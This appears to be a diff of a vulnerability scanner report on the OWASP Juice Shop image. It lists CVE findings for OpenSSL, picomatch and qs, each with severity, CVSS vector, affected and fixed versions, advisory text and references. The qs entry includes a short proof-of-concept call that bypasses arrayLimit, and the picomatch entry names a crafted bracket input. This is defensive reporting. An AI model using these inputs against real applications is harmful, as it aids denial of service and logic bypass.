juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection +vulnerability affecting the POSIX_REGEX_SOURCE object. Because the object inherits from Object.prototype, specially crafted POSIX bracket expressions (e.g., [[:constructor:]]) + can reference inherited method names. These methods are implicitly +converted to strings and injected into the generated regular expression. + This leads to incorrect glob matching behavior (integrity impact), +where patterns may match unintended filenames. The issue does not enable + remote code execution, but it can cause security-relevant logic errors +in applications that rely on glob matching for filtering, validation, or + access control. All users of affected picomatch versions +that process untrusted or user-controlled glob patterns are potentially +impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users + should upgrade to one of these versions or later, depending on their +supported release line. If upgrading is not immediately possible, avoid +passing untrusted glob patterns to picomatch. Possible mitigations +include sanitizing or rejecting untrusted glob patterns, especially +those containing POSIX character classes like [[:...:]]; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying POSIX_REGEX_SOURCE to use a null prototype.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33672
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903
+https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p
+https://nvd.nist.gov/vuln/detail/CVE-2026-33672
+https://www.cve.org/CVERecord?id=CVE-2026-33672

+ + + + + + + +
+
+
+
+ Finding 184: CVE-2025-15284 Qs 6.13.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
qs6.13.0
+ + + + + + + +
File Path
juice-shop/node_modules/qs/package.json
+
+
+
+ + + + + +
Description
+

qs: qs: Denial of Service via improper input validation in array parsing
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.14.1

+

Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1.

+

Summary

+

The arrayLimit option in qs did not enforce limits for bracket +notation (a[]=1&a[]=2), only for indexed notation (a[0]=1). This is a + consistency bug; arrayLimit should apply uniformly across all +array notations.

+

Note: The default parameterLimit of 1000 effectively +mitigates the DoS scenario originally described. With default options, +bracket notation cannot produce arrays larger than +parameterLimit regardless of arrayLimit, because each +a[]=valueconsumes one parameter slot. The severity has been reduced +accordingly.

+

Details

+

The arrayLimit option only checked limits for indexed notation +(a[0]=1&a[1]=2) but did not enforce it for bracket notation +(a[]=1&a[]=2).

+

Vulnerable code (lib/parse.js:159-162):

+

if (root === '[]' && options.parseArrays) {
+ obj = utils.combine([], leaf); // No arrayLimit check
+}

+

Working code (lib/parse.js:175):

+

else if (index <= options.arrayLimit) { // Limit checked here
+ obj = [];
+ obj[index] = leaf;
+}

+

The bracket notation handler at line 159 uses utils.combine([], +leaf) without validating against options.arrayLimit, while indexed +notation at line 175 checks index <= options.arrayLimit before +creating arrays.

+

PoC

+

const qs = require('qs');
+const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
+console.log(result.a.length); // Output: 6 (should be max 5)

+

Note on parameterLimit interaction: The original advisory's "DoS + demonstration" claimed a length of 10,000, but +parameterLimit (default: 1000) caps parsing to 1,000 parameters. +With default options, the actual output is 1,000, not 10,000.

+

Impact

+

Consistency bug in arrayLimit enforcement. With default +parameterLimit, the practical DoS risk is negligible since +parameterLimit already caps the total number of parsed parameters +(and thus array elements from bracket notation). The risk increases only + when parameterLimit is explicitly set to a very high value.

+ + +
Mitigation
+

6.14.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-15284
+https://github.com/ljharb/qs
+https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9
+https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p
+https://nvd.nist.gov/vuln/detail/CVE-2025-15284
+https://www.cve.org/CVERecord?id=CVE-2025-15284

+ + + + + + + +
+
+
+
+ Finding 57: CVE-2025-68160 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to out-of-bounds write in BIO filter
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Writing large, newline-free data into a BIO chain using the
+line-buffering filter where the next BIO performs short writes can trigger
+a heap-based out-of-bounds write.

+

Impact summary: This out-of-bounds write can cause memory corruption which
+typically results in a crash, leading to Denial of Service for an application.

+

The line-buffering BIO filter (BIO_f_linebuffer) is not used by default in
+TLS/SSL data paths. In OpenSSL command-line applications, it is typically
+only pushed onto stdout/stderr on VMS systems. Third-party applications that
+explicitly use this filter with a BIO chain that can short-write and that
+write large, newline-free data influenced by an attacker would be affected.
+However, the circumstances where this could happen are unlikely to be under
+attacker control, and BIO_f_linebuffer is unlikely to be handling non-curated
+data controlled by an attacker. For that reason the issue was assessed as
+Low severity.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the BIO implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-68160
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-g78j-46j5-97cr
+https://github.com/openssl/openssl/commit/384011202af92605d926fafe4a0bcd6b65d162ad
+https://github.com/openssl/openssl/commit/475c466ef2fbd8fc1df6fae1c3eed9c813fc8ff6
+https://github.com/openssl/openssl/commit/4c96fbba618e1940f038012506ee9e21d32ee12c
+https://github.com/openssl/openssl/commit/6845c3b6460a98b1ec4e463baa2ea1a63a32d7c0
+https://github.com/openssl/openssl/commit/68a7cd2e2816c3a02f4d45a2ce43fc04fac97096
+https://linux.oracle.com/cve/CVE-2025-68160.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-68160
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-68160

+ + + + + + + +
+
+
+
+ Finding 58: CVE-2025-69418 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 325 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

openssl: OpenSSL: Information disclosure and data tampering via specific low-level OCB encryption/decryption calls
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: When using the low-level OCB API directly with AES-NI or
other hardware-accelerated code paths, inputs whose length is not a multiple
of 16 bytes can leave the final partial block unencrypted and unauthenticated.

Impact summary: The trailing 1-15 bytes of a message may be exposed in
cleartext on encryption and are not covered by the authentication tag,
allowing an attacker to read or tamper with those bytes without detection.

The low-level OCB encrypt and decrypt routines in the hardware-accelerated
stream path process full 16-byte blocks but do not advance the input/output
pointers. The subsequent tail-handling code then operates on the original
base pointers, effectively reprocessing the beginning of the buffer while
leaving the actual trailing bytes unprocessed. The authentication checksum
also excludes the true tail bytes.

However, typical OpenSSL consumers using EVP are not affected because the
higher-level EVP and provider OCB implementations split inputs so that full
blocks and trailing partial blocks are processed in separate calls, avoiding
the problematic code path. Additionally, TLS does not use OCB ciphersuites.
The vulnerability only affects applications that call the low-level
CRYPTO_ocb128_encrypt() or CRYPTO_ocb128_decrypt() functions directly with
non-block-aligned lengths in a single call on hardware-accelerated builds.
For these reasons the issue was assessed as Low severity.

The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected
by this issue, as OCB mode is not a FIPS-approved algorithm.

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-69418
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-78qr-24v5-7q73
+https://github.com/openssl/openssl/commit/372fc5c77529695b05b4f5b5187691a57ef5dffc
+https://github.com/openssl/openssl/commit/4016975d4469cd6b94927c607f7c511385f928d8
+https://github.com/openssl/openssl/commit/52d23c86a54adab5ee9f80e48b242b52c4cc2347
+https://github.com/openssl/openssl/commit/a7589230356d908c0eca4b969ec4f62106f4f5ae
+https://github.com/openssl/openssl/commit/ed40856d7d4ba6cb42779b6770666a65f19cb977
+https://linux.oracle.com/cve/CVE-2025-69418.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69418
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69418

+ + + + + + + +
+
+
+
+ Finding 59: CVE-2025-69420 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service via malformed TimeStamp Response
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: A type confusion vulnerability exists in the TimeStamp Response
+verification code where an ASN1_TYPE union member is accessed without first
+validating the type, causing an invalid or NULL pointer dereference when
+processing a malformed TimeStamp Response file.

+

Impact summary: An application calling TS_RESP_verify_response() with a
+malformed TimeStamp Response can be caused to dereference an invalid or
+NULL pointer when reading, resulting in a Denial of Service.

+

The functions ossl_ess_get_signing_cert() and ossl_ess_get_signing_cert_v2()
+access the signing cert attribute value without validating its type.
+When the type is not V_ASN1_SEQUENCE, this results in accessing invalid memory
+through the ASN1_TYPE union, causing a crash.

+

Exploiting this vulnerability requires an attacker to provide a malformed
+TimeStamp Response to an application that verifies timestamp responses. The
+TimeStamp protocol (RFC 3161) is not widely used and the impact of the
+exploit is just a Denial of Service. For these reasons the issue was
+assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the TimeStamp Response implementation is outside the OpenSSL FIPS module
+boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-69420
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-w42r-ph9f-9x66
+https://github.com/openssl/openssl/commit/27c7012c91cc986a598d7540f3079dfde2416eb9
+https://github.com/openssl/openssl/commit/4e254b48ad93cc092be3dd62d97015f33f73133a
+https://github.com/openssl/openssl/commit/564fd9c73787f25693bf9e75faf7bf6bb1305d4e
+https://github.com/openssl/openssl/commit/5eb0770ffcf11b785cf374ff3c19196245e54f1b
+https://github.com/openssl/openssl/commit/a99349ebfc519999edc50620abe24d599b9eb085
+https://linux.oracle.com/cve/CVE-2025-69420.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69420
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69420

+ + + + + + + +
+
+
+
+ Finding 60: CVE-2025-9230 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 125 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

openssl: Out-of-bounds read & write in RFC 3211 KEK Unwrap
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.17-1~deb12u3

+

Issue summary: An application trying to decrypt CMS messages encrypted using
+password based encryption can trigger an out-of-bounds read and write.

+

Impact summary: This out-of-bounds read may trigger a crash which leads to
+Denial of Service for an application. The out-of-bounds write can cause
+a memory corruption which can have various consequences including
+a Denial of Service or Execution of attacker-supplied code.

+

Although the consequences of a successful exploit of this vulnerability
+could be severe, the probability that the attacker would be able to
+perform it is low. Besides, password based (PWRI) encryption support in CMS
+messages is very rarely used. For that reason the issue was assessed as
+Moderate severity according to our Security Policy.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
+issue, as the CMS implementation is outside the OpenSSL FIPS module
+boundary.

+ + +
Mitigation
+

3.0.17-1~deb12u3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/09/30/5
+https://access.redhat.com/errata/RHSA-2026:2776
+https://access.redhat.com/security/cve/CVE-2025-9230
+https://bugzilla.redhat.com/2396054
+https://bugzilla.redhat.com/show_bug.cgi?id=2396054
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9230
+https://errata.almalinux.org/9/ALSA-2026-2776.html
+https://errata.rockylinux.org/RLSA-2025:21255
+https://github.com/openssl/openssl/commit/5965ea5dd6960f36d8b7f74f8eac67a8eb8f2b45
+https://github.com/openssl/openssl/commit/9e91358f365dee6c446dcdcdb01c04d2743fd280
+https://github.com/openssl/openssl/commit/a79c4ce559c6a3a8fd4109e9f33c1185d5bf2def
+https://github.com/openssl/openssl/commit/b5282d677551afda7d20e9c00e09561b547b2dfd
+https://github.com/openssl/openssl/commit/bae259a211ada6315dc50900686daaaaaa55f482
+https://github.openssl.org/openssl/extended-releases/commit/c2b96348bfa662f25f4fabf81958ae822063dae3
+https://github.openssl.org/openssl/extended-releases/commit/dfbaf161d8dafc1132dd88cd48ad990ed9b4c8ba
+https://linux.oracle.com/cve/CVE-2025-9230.html
+https://linux.oracle.com/errata/ELSA-2026-50114.html
+https://lists.debian.org/debian-lts-announce/2025/10/msg00001.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-9230
+https://openssl-library.org/news/secadv/20250930.txt
+https://ubuntu.com/security/notices/USN-7786-1
+https://www.cve.org/CVERecord?id=CVE-2025-9230

+ + + + + + + +
+
+
+
+ Finding 61: CVE-2026-22795 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to type confusion in PKCS#12 file processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: An invalid or NULL pointer dereference can happen in
+an application processing a malformed PKCS#12 file.

+

Impact summary: An application processing a malformed PKCS#12 file can be
+caused to dereference an invalid or NULL pointer on memory read, resulting
+in a Denial of Service.

+

A type confusion vulnerability exists in PKCS#12 parsing code where
+an ASN1_TYPE union member is accessed without first validating the type,
+causing an invalid pointer read.

+

The location is constrained to a 1-byte address space, meaning any
+attempted pointer manipulation can only target addresses between 0x00 and 0xFF.
+This range corresponds to the zero page, which is unmapped on most modern
+operating systems and will reliably result in a crash, leading only to a
+Denial of Service. Exploiting this issue also requires a user or application
+to process a maliciously crafted PKCS#12 file. It is uncommon to accept
+untrusted PKCS#12 files in applications as they are usually used to store
+private keys which are trusted by definition. For these reasons, the issue
+was assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2026-22795
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-3vqq-45qg-2xf6
+https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4
+https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49
+https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12
+https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e
+https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2
+https://linux.oracle.com/cve/CVE-2026-22795.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-22795
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2026-22795

+ + + + + + + +
+
+
+
+ Finding 62: CVE-2026-22796 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
